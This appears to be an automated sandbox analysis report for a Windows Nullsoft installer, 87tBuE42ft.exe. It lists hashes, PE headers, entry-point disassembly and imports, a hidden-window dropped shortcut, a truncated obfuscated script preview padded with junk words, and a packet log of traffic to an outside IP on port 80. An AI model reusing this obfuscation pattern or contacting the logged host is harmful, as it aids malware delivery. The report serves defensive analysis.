                                                Preview:$Filmforedrag=$Succulency;<#Inkassosalrernes Kollokvium Katchina Regeneratorer Musicalizations #><#uforstyrreligheden Noncertainty Importerende boraginaceous #><#Berigtigedes Antispectroscopic Lensaflsning tenementizes Trancetilstandens #><#Trygl Korroderede Inures Bogtrykte #><#Pomiferous Pseudoambidextrous Satirizables Andelsvirksomheders Edelweissens #><#Didodecahedral Unforgone Equationally pentathlos Grnts Overfusning #><#Hangout Foraarstrtheden Herskerinder Volcanized Regnesystems #><#bestikene Skjorterne Politianmeldelserne #><#Pattedyret Inducts Jernets Pailletternes #><#Tafter Venstreskrunings Refavours Hostlers Handelsruterne #><#Sittringy Parrotbill Skattedepartementernes #><#Lawned Seamanlikeness Counterdraft tegneblokkenes #><#Jernbyrd Snapshotted Aftaleoversigtens Surprised Srgelige Cerrial graapil #><#Bevidstgjortes Lysstraalen Monoernes protoalbumose #><#Dybvandshummernes Udpnsningers Faciend #><#Quipful Sorterendes Handledes #><#Adz Contestate Kommunikationsvrktj Progr
                                                Process:C:\Users\user\Desktop\87tBuE42ft.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):1074
                                                Entropy (8bit):3.3249611660827045
                                                Encrypted:false
                                                SSDEEP:12:8wl0esXowAOcQ/GXBXM1QrVmkR41SpFzaJR41SpgoRKMJGyU3O3W3VHFxClD+w4U:8lLDeqiJTXYThr44G3VbClD+Iqy
                                                MD5:4041E4A6EB501A89C6BAD89F364A35CD
                                                SHA1:003E88EDCBF53CBD9C935D58F0DC27DADCFD9C16
                                                SHA-256:E1F1299D3B4B73D188EA712D3F6A94BD85A3178C780AED268AB2FF30E7756BD2
                                                SHA-512:E2982EB5E35CFEC51D6B24FE26A491BBEAC67A7A480EFAC1869FDBF296F23FEA7F7BB95E0ECD5E0E922C508C8BCF55275CC670754E482F599FB2176B4E7C4541
                                                Malicious:false
                                                Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........Desktop.@............................................D.e.s.k.t.o.p.....Z.1...........Vmmeligt..B............................................V.m.m.e.l.i.g.t.......2...........manufakturhandlernes.Ter156.h............................................m.a.n.u.f.a.k.t.u.r.h.a.n.d.l.e.r.n.e.s...T.e.r.1.5.6...*.../.....\.D.e.s.k.t.o.p.\.V.m.m.e.l.i.g.t.\.m.a.n.u.f.a.k.t.u.r.h.a.n.d.l.e.r.n.e.s...T.e.r.1.5.6.\.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.U.s.i.t.a.t.i.v.e.\.h.e.a.l.t.h.l.e.s.s.\.h.o.v.e.d.a.n.p.a.r.t.s.h.a.v.e.r.\.C.r.i.c.o.t.o.m.y.6.6.\.R.e.f.l.e.k.s.i.v.s.........:..,.LB.)...A#...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.408219938796684
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:87tBuE42ft.exe
                                                File size:533'139 bytes
                                                MD5:ef53493176b714d7c8c972a756cfd806
                                                SHA1:c7c08850f9dd1706a2a2a5b456f5de2b25eb200c
                                                SHA256:1353d2318463be28ebcffe36398b90b873ee21e2bde3d03f929103729c4b95ea
                                                SHA512:eab8465a629001a43631724aaa9293c229286bebb33c943ce197ce5f17419b9b91c6f9be86c4dec68d4b099871abf3fa05807e99876ffa0ee3497f3a5abac2fa
                                                SSDEEP:12288:fnPdhsFldr2BFS3Cr3HUNdAfZBAfYKBuyhleDJB:vPdhoeBYSrHU7K9KBuRJB
                                                TLSH:44B4F107725482B7CC7840B5A8E78297CB717C3DC5686A432BCCB63F69E75B2C42A716
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                Icon Hash:8b6d4e4e2e4c390f
                                                Entrypoint:0x403645
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                Instruction
                                                sub esp, 000003F8h
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebp, ebp
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebp
                                                mov dword ptr [esp+18h], 0040A230h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [004080A0h]
                                                mov esi, dword ptr [004080A4h]
                                                lea eax, dword ptr [esp+34h]
                                                push eax
                                                mov dword ptr [esp+4Ch], ebp
                                                mov dword ptr [esp+0000014Ch], ebp
                                                mov dword ptr [esp+00000150h], ebp
                                                mov dword ptr [esp+38h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007FA8212370CAh
                                                lea eax, dword ptr [esp+34h]
                                                mov dword ptr [esp+34h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [esp+48h]
                                                mov ecx, dword ptr [esp+62h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [esp+0000014Eh], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [esp+00000148h], ax
                                                cmp dword ptr [esp+38h], 0Ah
                                                jnc 00007FA821237098h
                                                and word ptr [esp+42h], 0000h
                                                mov eax, dword ptr [esp+40h]
                                                movzx ecx, byte ptr [esp+3Ch]
                                                mov dword ptr [00429B18h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [esp+38h]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [esp+00000148h]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                movzx ecx, byte ptr [esp+0000004Eh]
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x2b718.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x66b70x6800e65344ac983813901119e185754ec24eFalse0.6607196514423077data6.4378696011937135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x1fb780x600caa377d001cfc3215a3edff6d7702132False0.5091145833333334data4.126209888385862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x2a0000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x460000x2b7180x2b800db5b9269ffbc9c8ecf65ce110c6a42ddFalse0.5468413254310345data5.388979714268102IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x463880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.5025139003903939
                                                RT_ICON0x56bb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5633014504940088
                                                RT_ICON0x600580x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5818391866913124
                                                RT_ICON0x654e00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5644189891355692
                                                RT_ICON0x697080x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12800EnglishUnited States0.5690809968847352
                                                RT_ICON0x6c9300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6132780082987552
                                                RT_ICON0x6eed80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6308630393996247
                                                RT_ICON0x6ff800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6622950819672131
                                                RT_ICON0x709080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.726063829787234
                                                RT_DIALOG0x70d700x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x70e700x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x70f900xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0x710580x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x710b80x84dataEnglishUnited States0.7272727272727273
                                                RT_VERSION0x711400x298OpenPGP Public KeyEnglishUnited States0.46686746987951805
                                                RT_MANIFEST0x713d80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                DLLImport
                                                ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 22, 2024 13:33:53.494059086 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.663806915 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.663922071 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.664129972 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.838898897 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.838922024 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.838994980 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.838994980 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.839077950 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.839135885 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.839167118 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.839231968 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.839277983 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.839370012 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.839405060 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.839474916 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.839493036 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.839580059 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.839591026 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.839708090 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.839713097 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.839807987 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:53.839828968 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:53.839935064 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.008874893 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.008929014 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.008956909 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.009026051 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.009025097 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.009087086 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.009125948 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.009170055 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.012727976 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.012772083 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.012825012 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.012873888 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.012932062 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.012974977 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.013029099 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.013089895 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.013127089 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.013190031 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.013844013 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.013906002 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.014810085 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.014858961 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.015810966 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.015911102 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.016299009 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.016316891 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.016334057 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.016351938 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.016364098 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.016370058 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.016387939 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.016400099 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.016406059 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.016417027 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.016426086 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.016438961 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.016458035 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.016477108 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.181998968 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.182092905 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.182109118 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.182161093 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.182193995 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.182228088 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.182291031 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.182332993 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.182394981 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.182440996 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.182476997 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.182580948 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.182617903 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.182663918 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.182738066 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.182801008 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.185306072 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.185376883 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.185406923 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.185462952 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.185516119 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.185579062 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.185606003 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.185712099 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.185730934 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.185795069 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.185831070 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.185888052 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.185940981 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.186012030 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.186053991 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.186189890 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.186229944 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.186270952 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.186295986 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.186361074 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.186414003 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.186470985 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.186471939 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.186525106 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.186610937 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.186666965 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.186718941 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.186764956 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.188575029 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.188626051 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.188652039 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.188703060 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.188855886 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.188898087 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.188913107 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.188970089 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.188996077 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189044952 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.189097881 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189182997 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.189192057 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189237118 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.189316988 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189371109 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.189423084 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189492941 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.189554930 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189610004 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.189610004 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189657927 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.189801931 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189865112 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.189901114 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189973116 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.189994097 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.190021038 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.190114021 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.190165043 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.190201998 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.190274000 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.190296888 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.190380096 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.190418005 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.190498114 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.352159977 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.352212906 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.352235079 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.352283955 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.352355003 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.352401018 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.352416039 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.352498055 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.352533102 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.352582932 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.352611065 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.352668047 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.355588913 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.355642080 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.355674982 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.355715036 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.355792046 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.355859995 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.355938911 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.355995893 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.356031895 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356076956 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.356137037 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356189013 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.356244087 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356293917 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.356376886 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356424093 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.356426001 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356468916 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.356574059 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356626034 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:33:54.356698036 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:33:54.356750011 CEST4973580192.168.2.4172.93.222.219
